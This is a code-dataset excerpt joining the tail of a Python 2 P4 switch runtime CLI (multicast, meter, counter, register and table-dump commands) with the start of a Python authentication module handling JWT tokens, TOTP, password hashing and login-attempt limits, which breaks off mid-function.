@handle_bad_input_mc
def do_mc_node_associate(self, line):
"Associate node to multicast group: mc_node_associate <group handle> <node handle>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 2)
mgrp = self.get_mgrp(args[0])
l1_hdl = self.get_node_handle(args[1])
print "Associating node", l1_hdl, "to multicast group", mgrp
self.mc_client.bm_mc_node_associate(0, mgrp, l1_hdl)
@handle_bad_input_mc
def do_mc_node_dissociate(self, line):
"Dissociate node from multicast group: mc_node_associate <group handle> <node handle>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 2)
mgrp = self.get_mgrp(args[0])
l1_hdl = self.get_node_handle(args[1])
print "Dissociating node", l1_hdl, "from multicast group", mgrp
self.mc_client.bm_mc_node_dissociate(0, mgrp, l1_hdl)
@handle_bad_input_mc
def do_mc_node_destroy(self, line):
"Destroy multicast node: mc_node_destroy <node handle>"
self.check_has_pre()
args = line.split()
self.exactly_n_args(args, 1)
l1_hdl = int(line.split()[0])
print "Destroying node", l1_hdl
self.mc_client.bm_mc_node_destroy(0, l1_hdl)
@handle_bad_input_mc
def do_mc_set_lag_membership(self, line):
"Set lag membership of port list: mc_set_lag_membership <lag index> <space-separated port list>"
self.check_has_pre()
if self.pre_type != PreType.SimplePreLAG:
raise UIn_Error(
"Cannot execute this command with this type of PRE,"\
" SimplePreLAG is required"
)
args = line.split()
self.at_least_n_args(args, 2)
try:
lag_index = int(args[0])
except:
raise UIn_Error("Bad format for lag index")
port_map_str = self.ports_to_port_map_str(args[1:], description="lag")
print "Setting lag membership:", lag_index, "<-", port_map_str
self.mc_client.bm_mc_set_lag_membership(0, lag_index, port_map_str)
@handle_bad_input_mc
def do_mc_dump(self, line):
"Dump entries in multicast engine"
self.check_has_pre()
json_dump = self.mc_client.bm_mc_get_entries(0)
try:
mc_json = json.loads(json_dump)
except:
print "Exception when retrieving MC entries"
return
l1_handles = {}
for h in mc_json["l1_handles"]:
l1_handles[h["handle"]] = (h["rid"], h["l2_handle"])
l2_handles = {}
for h in mc_json["l2_handles"]:
l2_handles[h["handle"]] = (h["ports"], h["lags"])
print "=========="
print "MC ENTRIES"
for mgrp in mc_json["mgrps"]:
print "**********"
mgid = mgrp["id"]
print "mgrp({})".format(mgid)
for L1h in mgrp["l1_handles"]:
rid, L2h = l1_handles[L1h]
print " -> (L1h={}, rid={})".format(L1h, rid),
ports, lags = l2_handles[L2h]
print "-> (ports=[{}], lags=[{}])".format(
", ".join([str(p) for p in ports]),
", ".join([str(l) for l in lags]))
print "=========="
print "LAGS"
if "lags" in mc_json:
for lag in mc_json["lags"]:
print "lag({})".format(lag["id"]),
print "-> ports=[{}]".format(", ".join([str(p) for p in ports]))
else:
print "None for this PRE type"
print "=========="
@handle_bad_input
def do_load_new_config_file(self, line):
"Load new json config: load_new_config_file <path to .json file>"
args = line.split()
self.exactly_n_args(args, 1)
filename = args[0]
if not os.path.isfile(filename):
raise UIn_Error("Not a valid filename")
print "Loading new Json config"
with open(filename, 'r') as f:
json_str = f.read()
try:
json.loads(json_str)
except:
raise UIn_Error("Not a valid JSON file")
self.client.bm_load_new_config(json_str)
load_json_str(json_str)
@handle_bad_input
def do_swap_configs(self, line):
"Swap the 2 existing configs, need to have called load_new_config_file before"
print "Swapping configs"
self.client.bm_swap_configs()
@handle_bad_input
def do_meter_array_set_rates(self, line):
"Configure rates for an entire meter array: meter_array_set_rates <name> <rate_1>:<burst_1> <rate_2>:<burst_2> ..."
args = line.split()
self.at_least_n_args(args, 1)
meter_name = args[0]
meter = self.get_res("meter", meter_name, ResType.meter_array)
rates = args[1:]
if len(rates) != meter.rate_count:
raise UIn_Error(
"Invalid number of rates, expected %d but got %d"\
% (meter.rate_count, len(rates))
)
new_rates = []
for rate in rates:
try:
r, b = rate.split(':')
r = float(r)
b = int(b)
new_rates.append(BmMeterRateConfig(r, b))
except:
raise UIn_Error("Error while parsing rates")
self.client.bm_meter_array_set_rates(0, meter.name, new_rates)
def complete_meter_array_set_rates(self, text, line, start_index, end_index):
return self._complete_meters(text)
@handle_bad_input
def do_meter_set_rates(self, line):
"Configure rates for a meter: meter_set_rates <name> <index> <rate_1>:<burst_1> <rate_2>:<burst_2> ..."
args = line.split()
self.at_least_n_args(args, 2)
meter_name = args[0]
meter = self.get_res("meter", meter_name, ResType.meter_array)
try:
index = int(args[1])
except:
raise UIn_Error("Bad format for index")
rates = args[2:]
if len(rates) != meter.rate_count:
raise UIn_Error(
"Invalid number of rates, expected %d but got %d"\
% (meter.rate_count, len(rates))
)
new_rates = []
for rate in rates:
try:
r, b = rate.split(':')
r = float(r)
b = int(b)
new_rates.append(BmMeterRateConfig(r, b))
except:
raise UIn_Error("Error while parsing rates")
if meter.is_direct:
table_name = meter.binding
self.client.bm_mt_set_meter_rates(0, table_name, index, new_rates)
else:
self.client.bm_meter_set_rates(0, meter.name, index, new_rates)
def complete_meter_set_rates(self, text, line, start_index, end_index):
return self._complete_meters(text)
@handle_bad_input
def do_meter_get_rates(self, line):
"Retrieve rates for a meter: meter_get_rates <name> <index>"
args = line.split()
self.exactly_n_args(args, 2)
meter_name = args[0]
meter = self.get_res("meter", meter_name, ResType.meter_array)
try:
index = int(args[1])
except:
raise UIn_Error("Bad format for index")
# meter.rate_count
if meter.is_direct:
table_name = meter.binding
rates = self.client.bm_mt_get_meter_rates(0, table_name, index)
else:
rates = self.client.bm_meter_get_rates(0, meter.name, index)
if len(rates) != meter.rate_count:
print "WARNING: expected", meter.rate_count, "rates",
print "but only received", len(rates)
for idx, rate in enumerate(rates):
print "{}: info rate = {}, burst size = {}".format(
idx, rate.units_per_micros, rate.burst_size)
def complete_meter_get_rates(self, text, line, start_index, end_index):
return self._complete_meters(text)
def _complete_meters(self, text):
return self._complete_res(METER_ARRAYS, text)
@handle_bad_input
def do_counter_read(self, line):
"Read counter value: counter_read <name> <index>"
args = line.split()
self.exactly_n_args(args, 2)
counter_name = args[0]
counter = self.get_res("counter", counter_name, ResType.counter_array)
index = args[1]
try:
index = int(index)
except:
raise UIn_Error("Bad format for index")
if counter.is_direct:
table_name = counter.binding
print "this is the direct counter for table", table_name
# index = index & 0xffffffff
value = self.client.bm_mt_read_counter(0, table_name, index)
else:
value = self.client.bm_counter_read(0, counter.name, index)
print "%s[%d]= " % (counter_name, index), value
def complete_counter_read(self, text, line, start_index, end_index):
return self._complete_counters(text)
@handle_bad_input
def do_counter_reset(self, line):
"Reset counter: counter_reset <name>"
args = line.split()
self.exactly_n_args(args, 1)
counter_name = args[0]
counter = self.get_res("counter", counter_name, ResType.counter_array)
if counter.is_direct:
table_name = counter.binding
print "this is the direct counter for table", table_name
value = self.client.bm_mt_reset_counters(0, table_name)
else:
value = self.client.bm_counter_reset_all(0, counter.name)
def complete_counter_reset(self, text, line, start_index, end_index):
return self._complete_counters(text)
def _complete_counters(self, text):
return self._complete_res(COUNTER_ARRAYS, text)
@handle_bad_input
def do_register_read(self, line):
"Read register value: register_read <name> [index]"
args = line.split()
self.at_least_n_args(args, 1)
register_name = args[0]
register = self.get_res("register", register_name,
ResType.register_array)
if len(args) > 1:
self.exactly_n_args(args, 2)
index = args[1]
try:
index = int(index)
except:
raise UIn_Error("Bad format for index")
value = self.client.bm_register_read(0, register.name, index)
print "{}[{}]=".format(register_name, index), value
else:
sys.stderr.write("register index omitted, reading entire array\n")
entries = self.client.bm_register_read_all(0, register.name)
print "{}=".format(register_name), ", ".join(
[str(e) for e in entries])
def complete_register_read(self, text, line, start_index, end_index):
return self._complete_registers(text)
@handle_bad_input
def do_register_write(self, line):
"Write register value: register_write <name> <index> <value>"
args = line.split()
self.exactly_n_args(args, 3)
register_name = args[0]
register = self.get_res("register", register_name,
ResType.register_array)
index = args[1]
try:
index = int(index)
except:
raise UIn_Error("Bad format for index")
value = args[2]
try:
value = int(value)
except:
raise UIn_Error("Bad format for value, must be an integer")
self.client.bm_register_write(0, register.name, index, value)
def complete_register_write(self, text, line, start_index, end_index):
return self._complete_registers(text)
@handle_bad_input
def do_register_reset(self, line):
"Reset all the cells in the register array to 0: register_reset <name>"
args = line.split()
self.exactly_n_args(args, 1)
register_name = args[0]
self.client.bm_register_reset(0, register.name)
def complete_register_reset(self, text, line, start_index, end_index):
return self._complete_registers(text)
def _complete_registers(self, text):
return self._complete_res(REGISTER_ARRAYS, text)
def dump_action_and_data(self, action_name, action_data):
def hexstr(v):
return "".join("{:02x}".format(ord(c)) for c in v)
print "Action entry: {} - {}".format(
action_name, ", ".join([hexstr(a) for a in action_data]))
def dump_action_entry(self, a_entry):
if a_entry.action_type == BmActionEntryType.NONE:
print "EMPTY"
elif a_entry.action_type == BmActionEntryType.ACTION_DATA:
self.dump_action_and_data(a_entry.action_name, a_entry.action_data)
elif a_entry.action_type == BmActionEntryType.MBR_HANDLE:
print "Index: member({})".format(a_entry.mbr_handle)
elif a_entry.action_type == BmActionEntryType.GRP_HANDLE:
print "Index: group({})".format(a_entry.grp_handle)
def dump_one_member(self, member):
print "Dumping member {}".format(member.mbr_handle)
self.dump_action_and_data(member.action_name, member.action_data)
def dump_members(self, members):
for m in members:
print "**********"
self.dump_one_member(m)
def dump_one_group(self, group):
print "Dumping group {}".format(group.grp_handle)
print "Members: [{}]".format(", ".join(
[str(h) for h in group.mbr_handles]))
def dump_groups(self, groups):
for g in groups:
print "**********"
self.dump_one_group(g)
def dump_one_entry(self, table, entry):
if table.key:
out_name_w = max(20, max([len(t[0]) for t in table.key]))
def hexstr(v):
return "".join("{:02x}".format(ord(c)) for c in v)
def dump_exact(p):
return hexstr(p.exact.key)
def dump_lpm(p):
return "{}/{}".format(hexstr(p.lpm.key), p.lpm.prefix_length)
def dump_ternary(p):
return "{} &&& {}".format(hexstr(p.ternary.key),
hexstr(p.ternary.mask))
def dump_range(p):
return "{} -> {}".format(hexstr(p.range.start),
hexstr(p.range.end_))
def dump_valid(p):
return "01" if p.valid.key else "00"
pdumpers = {"exact": dump_exact, "lpm": dump_lpm,
"ternary": dump_ternary, "valid": dump_valid,
"range": dump_range}
print "Dumping entry {}".format(hex(entry.entry_handle))
print "Match key:"
for p, k in zip(entry.match_key, table.key):
assert(k[1] == p.type)
pdumper = pdumpers[MatchType.to_str(p.type)]
print "* {0:{w}}: {1:10}{2}".format(
k[0], MatchType.to_str(p.type).upper(),
pdumper(p), w=out_name_w)
if entry.options.priority >= 0:
print "Priority: {}".format(entry.options.priority)
self.dump_action_entry(entry.action_entry)
if entry.life is not None:
print "Life: {}ms since hit, timeout is {}ms".format(
entry.life.time_since_hit_ms, entry.life.timeout_ms)
@handle_bad_input
def do_table_dump_entry(self, line):
"Display some information about a table entry: table_dump_entry <table name> <entry handle>"
args = line.split()
self.exactly_n_args(args, 2)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
try:
entry_handle = int(args[1])
except:
raise UIn_Error("Bad format for entry handle")
entry = self.client.bm_mt_get_entry(0, table.name, entry_handle)
self.dump_one_entry(table, entry)
def complete_table_dump_entry(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_dump_member(self, line):
"Display some information about a member: act_prof_dump_member <action profile name> <member handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
try:
mbr_handle = int(args[1])
except:
raise UIn_Error("Bad format for member handle")
member = self.client.bm_mt_act_prof_get_member(
0, act_prof.name, mbr_handle)
self.dump_one_member(member)
def complete_act_prof_dump_member(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
# notice the strictly_deprecated=False; I don't consider this command to be
# strictly deprecated because it can be convenient and does not modify the
# action profile so won't create problems
@deprecated_act_prof("act_prof_dump_member", with_selection=False,
strictly_deprecated=False)
def do_table_dump_member(self, line):
"Display some information about a member: table_dump_member <table name> <member handle>"
pass
def complete_table_dump_member(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_act_prof_dump_group(self, line):
"Display some information about a group: table_dump_group <action profile name> <group handle>"
args = line.split()
self.exactly_n_args(args, 2)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
try:
grp_handle = int(args[1])
except:
raise UIn_Error("Bad format for group handle")
group = self.client.bm_mt_act_prof_get_group(
0, act_prof.name, grp_handle)
self.dump_one_group(group)
def complete_act_prof_dump_group(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@deprecated_act_prof("act_prof_dump_group", with_selection=False,
strictly_deprecated=False)
def do_table_dump_group(self, line):
"Display some information about a group: table_dump_group <table name> <group handle>"
pass
def complete_table_dump_group(self, text, line, start_index, end_index):
return self._complete_tables(text)
def _dump_act_prof(self, act_prof):
act_prof_name = act_prof.name
members = self.client.bm_mt_act_prof_get_members(0, act_prof.name)
print "=========="
print "MEMBERS"
self.dump_members(members)
if act_prof.with_selection:
groups = self.client.bm_mt_act_prof_get_groups(0, act_prof.name)
print "=========="
print "GROUPS"
self.dump_groups(groups)
@handle_bad_input
def do_act_prof_dump(self, line):
"Display entries in an action profile: act_prof_dump <action profile name>"
args = line.split()
self.exactly_n_args(args, 1)
act_prof_name = args[0]
act_prof = self.get_res("action profile", act_prof_name,
ResType.action_prof)
self._dump_act_prof(act_prof)
def complete_act_prof_dump(self, text, line, start_index, end_index):
return self._complete_act_profs(text)
@handle_bad_input
def do_table_dump(self, line):
"Display entries in a match-table: table_dump <table name>"
args = line.split()
self.exactly_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
entries = self.client.bm_mt_get_entries(0, table.name)
print "=========="
print "TABLE ENTRIES"
for e in entries:
print "**********"
self.dump_one_entry(table, e)
if table.type_ == TableType.indirect or\
table.type_ == TableType.indirect_ws:
assert(table.action_prof is not None)
self._dump_act_prof(table.action_prof)
# default entry
default_entry = self.client.bm_mt_get_default_entry(0, table.name)
print "=========="
print "Dumping default entry"
self.dump_action_entry(default_entry)
print "=========="
def complete_table_dump(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_table_dump_entry_from_key(self, line):
"Display some information about a table entry: table_dump_entry_from_key <table name> <match fields> [priority]"
args = line.split()
self.at_least_n_args(args, 1)
table_name = args[0]
table = self.get_res("table", table_name, ResType.table)
if table.match_type in {MatchType.TERNARY, MatchType.RANGE}:
try:
priority = int(args.pop(-1))
except:
raise UIn_Error(
"Table is ternary, but could not extract a valid priority from args"
)
else:
priority = 0
match_key = args[1:]
if len(match_key) != table.num_key_fields():
raise UIn_Error(
"Table %s needs %d key fields" % (table_name, table.num_key_fields())
)
match_key = parse_match_key(table, match_key)
entry = self.client.bm_mt_get_entry_from_key(
0, table.name, match_key, BmAddEntryOptions(priority = priority))
self.dump_one_entry(table, entry)
def complete_table_dump_entry_from_key(self, text, line, start_index, end_index):
return self._complete_tables(text)
@handle_bad_input
def do_port_add(self, line):
"Add a port to the switch (behavior depends on device manager used): port_add <iface_name> <port_num> [pcap_path]"
args = line.split()
self.at_least_n_args(args, 2)
iface_name = args[0]
try:
port_num = int(args[1])
except:
raise UIn_Error("Bad format for port_num, must be an integer")
pcap_path = ""
if len(args) > 2:
pcap_path = args[2]
self.client.bm_dev_mgr_add_port(iface_name, port_num, pcap_path)
@handle_bad_input
def do_port_remove(self, line):
"Removes a port from the switch (behavior depends on device manager used): port_remove <port_num>"
args = line.split()
self.exactly_n_args(args, 1)
try:
port_num = int(args[0])
except:
raise UIn_Error("Bad format for port_num, must be an integer")
self.client.bm_dev_mgr_remove_port(port_num)
@handle_bad_input
def do_show_ports(self, line):
"Shows the ports connected to the switch: show_ports"
self.exactly_n_args(line.split(), 0)
ports = self.client.bm_dev_mgr_show_ports()
print "{:^10}{:^20}{:^10}{}".format(
"port #", "iface name", "status", "extra info")
print "=" * 50
for port_info in ports:
status = "UP" if port_info.is_up else "DOWN"
extra_info = "; ".join(
[k + "=" + v for k, v in port_info.extra.items()])
print "{:^10}{:^20}{:^10}{}".format(
port_info.port_num, port_info.iface_name, status, extra_info)
@handle_bad_input
def do_switch_info(self, line):
"Show some basic info about the switch: switch_info"
self.exactly_n_args(line.split(), 0)
info = self.client.bm_mgmt_get_info()
attributes = [t[2] for t in info.thrift_spec[1:]]
out_attr_w = 5 + max(len(a) for a in attributes)
for a in attributes:
print "{:{w}}: {}".format(a, getattr(info, a), w=out_attr_w)
@handle_bad_input
def do_reset_state(self, line):
"Reset all state in the switch (table entries, registers, ...), but P4 config is preserved: reset_state"
self.exactly_n_args(line.split(), 0)
self.client.bm_reset_state()
@handle_bad_input
def do_write_config_to_file(self, line):
"Retrieves the JSON config currently used by the switch and dumps it to user-specified file"
args = line.split()
self.exactly_n_args(args, 1)
filename = args[0]
json_cfg = self.client.bm_get_config()
with open(filename, 'w') as f:
f.write(json_cfg)
@handle_bad_input
def do_serialize_state(self, line):
"Serialize the switch state and dumps it to user-specified file"
args = line.split()
self.exactly_n_args(args, 1)
filename = args[0]
state = self.client.bm_serialize_state()
with open(filename, 'w') as f:
f.write(state)
def set_crc_parameters_common(self, line, crc_width=16):
conversion_fn = {16: hex_to_i16, 32: hex_to_i32}[crc_width]
config_type = {16: BmCrc16Config, 32: BmCrc32Config}[crc_width]
thrift_fn = {16: self.client.bm_set_crc16_custom_parameters,
32: self.client.bm_set_crc32_custom_parameters}[crc_width]
args = line.split()
self.exactly_n_args(args, 6)
name = args[0]
if name not in CUSTOM_CRC_CALCS or CUSTOM_CRC_CALCS[name] != crc_width:
raise UIn_ResourceError("crc{}_custom".format(crc_width), name)
config_args = [conversion_fn(a) for a in args[1:4]]
config_args += [parse_bool(a) for a in args[4:6]]
crc_config = config_type(*config_args)
thrift_fn(0, name, crc_config)
def _complete_crc(self, text, crc_width=16):
crcs = sorted(
[c for c, w in CUSTOM_CRC_CALCS.items() if w == crc_width])
if not text:
return crcs
return [c for c in crcs if c.startswith(text)]
@handle_bad_input
def do_set_crc16_parameters(self, line):
"Change the parameters for a custom crc16 hash: set_crc16_parameters <name> <polynomial> <initial remainder> <final xor value> <reflect data?> <reflect remainder?>"
self.set_crc_parameters_common(line, 16)
def complete_set_crc16_parameters(self, text, line, start_index, end_index):
return self._complete_crc(text, 16)
@handle_bad_input
def do_set_crc32_parameters(self, line):
"Change the parameters for a custom crc32 hash: set_crc32_parameters <name> <polynomial> <initial remainder> <final xor value> <reflect data?> <reflect remainder?>"
self.set_crc_parameters_common(line, 32)
def complete_set_crc32_parameters(self, text, line, start_index, end_index):
return self._complete_crc(text, 32)
def load_json_config(standard_client=None, json_path=None):
load_json_str(utils.get_json_config(standard_client, json_path))
def get_api(port=9090):
standard_client, mc_client = thrift_connect(
'127.0.0.1', port,
RuntimeAPI.get_thrift_services(PreType.SimplePreLAG)
)
load_json_config(standard_client, None)
return RuntimeAPI(PreType.SimplePreLAG, standard_client, mc_client)
| 36.529734 | 172 | 0.619071 |
bd0789f5e1a93d01586ba30704cbd107a248cfa7 | 45,996 | py | Python | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 8 | 2018-07-04T09:54:46.000Z | 2022-03-17T08:21:06.000Z | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 19 | 2018-04-18T07:24:55.000Z | 2022-03-04T01:03:15.000Z | restapi/services/authentication.py | rapydo/http-api | ef0a299173195145303069534d45d446ea4da93a | [
"MIT"
] | 7 | 2018-07-03T12:17:50.000Z | 2021-05-05T04:33:32.000Z | import base64
import re
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from enum import Enum
from functools import lru_cache
from io import BytesIO
from pathlib import Path
from typing import (
TYPE_CHECKING,
Any,
Dict,
List,
Optional,
Tuple,
TypedDict,
Union,
cast,
)
import jwt
import pyotp
import pytz
import segno
from cryptography.fernet import Fernet
from cryptography.fernet import InvalidToken as InvalidFernetToken
from flask import request
from glom import glom
from jwt.exceptions import ExpiredSignatureError, ImmatureSignatureError
from passlib.context import CryptContext
from restapi.config import (
BACKEND_HOSTNAME,
BOT_HOSTNAME,
HOST_TYPE,
JWT_SECRET_FILE,
PRODUCTION,
PROXIED_CONNECTION,
TESTING,
TOTP_SECRET_FILE,
get_frontend_url,
get_project_configuration,
)
from restapi.env import Env
from restapi.exceptions import (
BadRequest,
Conflict,
Forbidden,
RestApiException,
ServerError,
ServiceUnavailable,
Unauthorized,
)
from restapi.types import Props
from restapi.utilities import print_and_exit
from restapi.utilities.globals import mem
from restapi.utilities.logs import Events, log, save_event_log
from restapi.utilities.time import EPOCH, get_now
from restapi.utilities.uuid import getUUID
# Trick to avoid circular dependencies
if TYPE_CHECKING: # pragma: no cover
from restapi.connectors import Connector
User = Any
Group = Any
RoleObj = Any
Login = Any
class AuthMissingTOTP(Exception):
pass
def import_secret(abs_filename: Path) -> bytes:
if HOST_TYPE != BACKEND_HOSTNAME and HOST_TYPE != BOT_HOSTNAME: # pragma: no cover
return Fernet.generate_key()
try:
return open(abs_filename, "rb").read()
# Can't be covered because it is execute once before the tests...
except OSError: # pragma: no cover
key = Fernet.generate_key()
with open(abs_filename, "wb") as key_file:
key_file.write(key)
abs_filename.chmod(0o400)
return key
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
ALL_ROLES = "all"
ANY_ROLE = "any"
ROLE_DISABLED = "disabled"
DEFAULT_GROUP_NAME = "Default"
DEFAULT_GROUP_DESCR = "Default group"
DISABLE_UNUSED_CREDENTIALS_AFTER_MIN_TESTNIG_VALUE = 60
MAX_PASSWORD_VALIDITY_MIN_TESTNIG_VALUE = 60
MAX_LOGIN_ATTEMPTS_MIN_TESTING_VALUE = 10
LOGIN_BAN_TIME_MAX_TESTING_VALUE = 10
# Produced by fill_payload
class Payload(TypedDict, total=False):
user_id: str
jti: str
t: str
iat: datetime
nbf: datetime
exp: datetime
# Produced by unpack_token. Datetimes are converted to int as specified in rfc7519
# https://tools.ietf.org/html/rfc7519#page-10
class DecodedPayload(TypedDict, total=False):
user_id: str
jti: str
t: str
iat: int
nbf: int
exp: int
class Token(TypedDict, total=False):
id: str
token: str
token_type: str
emitted: datetime
last_access: datetime
expiration: datetime
IP: str
location: str
user: Optional[User]
class Role(Enum):
ADMIN = "admin_root"
COORDINATOR = "group_coordinator"
STAFF = "staff_user"
USER = "normal_user"
class InvalidToken(Exception):
pass
# ##############################################################################
# Utility functions used to adapt security settings to Testable values
def get_timedelta(val: int, min_testing_val: int = 0) -> Optional[timedelta]:
if val == 0:
return None
if TESTING:
return timedelta(seconds=max(val, min_testing_val))
# Of course cannot be tested
return timedelta(days=val) # pragma: no cover
def get_max_login_attempts(val: int) -> int:
if TESTING and val:
# min 10 failures, otherwise normal tests will start to fail
return max(val, MAX_LOGIN_ATTEMPTS_MIN_TESTING_VALUE)
return val
def get_login_ban_time(val: int) -> int:
if TESTING and val:
# max 10 seconds, otherwise tests will hang
return min(val, LOGIN_BAN_TIME_MAX_TESTING_VALUE)
return val
# ##############################################################################
class BaseAuthentication(metaclass=ABCMeta):
"""
An almost abstract class with methods
to be implemented with a new service
that aims to store credentials of users and roles.
"""
JWT_SECRET: str = import_secret(JWT_SECRET_FILE).decode()
fernet = Fernet(import_secret(TOTP_SECRET_FILE))
# JWT_ALGO = 'HS256'
# Should be faster on 64bit machines
JWT_ALGO = "HS512"
# 1 month in seconds
DEFAULT_TOKEN_TTL = Env.get_int("AUTH_JWT_TOKEN_TTL", 2_592_000)
# Grace period before starting to evaluate IP address on token validation
GRACE_PERIOD = timedelta(seconds=Env.get_int("AUTH_TOKEN_IP_GRACE_PERIOD", 7200))
SAVE_LAST_ACCESS_EVERY = timedelta(
seconds=Env.get_int("AUTH_TOKEN_SAVE_FREQUENCY", 60)
)
FULL_TOKEN = "f"
PWD_RESET = "r"
ACTIVATE_ACCOUNT = "a"
UNLOCK_CREDENTIALS = "u"
TOTP = "TOTP"
MIN_PASSWORD_LENGTH = Env.get_int("AUTH_MIN_PASSWORD_LENGTH", 8)
SECOND_FACTOR_AUTHENTICATION = Env.get_bool(
"AUTH_SECOND_FACTOR_AUTHENTICATION", False
)
TOTP_VALIDITY_WINDOW = Env.get_int("AUTH_TOTP_VALIDITY_WINDOW", 1)
# enabled if explicitly set or for 2FA is enabled
FORCE_FIRST_PASSWORD_CHANGE = SECOND_FACTOR_AUTHENTICATION or Env.get_bool(
"AUTH_FORCE_FIRST_PASSWORD_CHANGE", False
)
MAX_PASSWORD_VALIDITY: Optional[timedelta] = get_timedelta(
Env.get_int("AUTH_MAX_PASSWORD_VALIDITY", 0),
MAX_PASSWORD_VALIDITY_MIN_TESTNIG_VALUE,
)
DISABLE_UNUSED_CREDENTIALS_AFTER: Optional[timedelta] = get_timedelta(
Env.get_int("AUTH_DISABLE_UNUSED_CREDENTIALS_AFTER", 0),
# min 60 seconds are required when testing
DISABLE_UNUSED_CREDENTIALS_AFTER_MIN_TESTNIG_VALUE,
)
MAX_LOGIN_ATTEMPTS = get_max_login_attempts(
Env.get_int("AUTH_MAX_LOGIN_ATTEMPTS", 8)
)
FAILED_LOGINS_EXPIRATION: timedelta = timedelta(
seconds=get_login_ban_time(Env.get_int("AUTH_LOGIN_BAN_TIME", 3600))
)
default_user: Optional[str] = None
default_password: Optional[str] = None
roles: List[str] = []
roles_data: Dict[str, str] = {}
default_role: str = Role.USER.value
# This is to let inform mypy about the existence of self.db
def __init__(self) -> None: # pragma: no cover
self.db: "Connector"
# Executed once by Connector in init_app
@classmethod
def module_initialization(cls) -> None:
cls.load_default_user()
cls.load_roles()
@staticmethod
def load_default_user() -> None:
BaseAuthentication.default_user = Env.get("AUTH_DEFAULT_USERNAME", "")
BaseAuthentication.default_password = Env.get("AUTH_DEFAULT_PASSWORD", "")
if (
not BaseAuthentication.default_user
or not BaseAuthentication.default_password
): # pragma: no cover
print_and_exit("Default credentials are unavailable!")
@staticmethod
def load_roles() -> None:
empty_dict: Dict[str, str] = {}
BaseAuthentication.roles_data = glom(
mem.configuration, "variables.roles", default=empty_dict
).copy()
if not BaseAuthentication.roles_data: # pragma: no cover
print_and_exit("No roles configured")
BaseAuthentication.default_role = BaseAuthentication.roles_data.pop(
"default", ""
)
if not BaseAuthentication.default_role: # pragma: no cover
print_and_exit("Default role not available!")
BaseAuthentication.roles = []
for role, description in BaseAuthentication.roles_data.items():
if description != ROLE_DISABLED:
BaseAuthentication.roles.append(role)
def make_login(
self, username: str, password: str, totp_code: Optional[str]
) -> Tuple[str, Payload, User]:
self.verify_blocked_username(username)
try:
user = self.get_user(username=username)
except ValueError as e: # pragma: no cover
# SqlAlchemy can raise the following error:
# A string literal cannot contain NUL (0x00) characters.
log.error(e)
raise BadRequest("Invalid input received")
except Exception as e: # pragma: no cover
log.error("Unable to connect to auth backend\n[{}] {}", type(e), e)
raise ServiceUnavailable("Unable to connect to auth backend")
if user is None:
self.register_failed_login(username, user=None)
self.log_event(
Events.failed_login,
payload={"username": username},
user=user,
)
raise Unauthorized("Invalid access credentials", is_warning=True)
# Currently only credentials are allowed
if user.authmethod != "credentials": # pragma: no cover
raise BadRequest("Invalid authentication method")
if not self.verify_password(password, user.password):
self.log_event(
Events.failed_login,
payload={"username": username},
user=user,
)
self.register_failed_login(username, user=user)
raise Unauthorized("Invalid access credentials", is_warning=True)
self.verify_user_status(user)
if self.SECOND_FACTOR_AUTHENTICATION and not totp_code:
raise AuthMissingTOTP()
if totp_code:
self.verify_totp(user, totp_code)
# Token expiration is capped by the user expiration date, if set
payload, full_payload = self.fill_payload(user, expiration=user.expiration)
token = self.create_token(payload)
self.save_login(username, user, failed=False)
self.log_event(Events.login, user=user)
return token, full_payload, user
# #####################
# # Password handling #
####################
@staticmethod
def verify_password(plain_password: str, hashed_password: str) -> bool:
try:
return cast(bool, pwd_context.verify(plain_password, hashed_password))
except ValueError as e: # pragma: no cover
log.error(e)
return False
@staticmethod
def get_password_hash(password: Optional[str]) -> str:
if not password:
raise Unauthorized("Invalid password")
# CryptContext is no typed.. but this is a string!
return cast(str, pwd_context.hash(password))
@staticmethod
def get_remote_ip(raise_warnings: bool = True) -> str:
try:
# Syntax: X-Forwarded-For: <client>, <proxy1>, <proxy2>
# <client> The client IP address
# <proxy1>, <proxy2> If a request goes through multiple proxies, the
# IP addresses of each successive proxy is listed. This means, the
# right-most IP address is the IP address of the most recent proxy
# and the left-most IP address is the IP address of the originating
# client.
if PROXIED_CONNECTION:
header_key = "X-Forwarded-For"
if forwarded_ips := request.headers.getlist(header_key):
# it can be something like: ['IP1, IP2']
return str(forwarded_ips[0].split(",")[0].strip())
# Standard (and more secure) way to obtain remote IP
else:
header_key = "X-Real-Ip"
# in testing mode X-Forwarded-For is used
if real_ip := request.headers.get(header_key): # pragma: no cover
return real_ip
if raise_warnings and PRODUCTION and not TESTING: # pragma: no cover
log.warning(
"Production mode is enabled, but {} header is missing", header_key
)
if request.remote_addr:
return request.remote_addr
# Raised when get_remote_ip is executed outside request context
# For example when creating tokens in initialize_testing_environment
except RuntimeError as e:
log.debug(e)
# Mocked IP to prevent tests failures when fn executed outside Flask context
return "0.0.0.0"
@staticmethod
@lru_cache
def localize_ip(ip: str) -> Optional[str]:
try:
data = mem.geo_reader.get(ip)
if data is None:
return None
if "country" in data:
try:
c = data["country"]["names"]["en"]
return c # type: ignore
except Exception: # pragma: no cover
log.error("Missing country.names.en in {}", data)
return None
if "continent" in data: # pragma: no cover
try:
c = data["continent"]["names"]["en"]
return c # type: ignore
except Exception:
log.error("Missing continent.names.en in {}", data)
return None
return None # pragma: no cover
except Exception as e:
log.error("{}. Input was {}", e, ip)
return None
# ###################
# # Tokens handling #
# ###################
@classmethod
def create_token(cls, payload: Payload) -> str:
"""Generate a str token with JWT library to encrypt the payload"""
return jwt.encode(
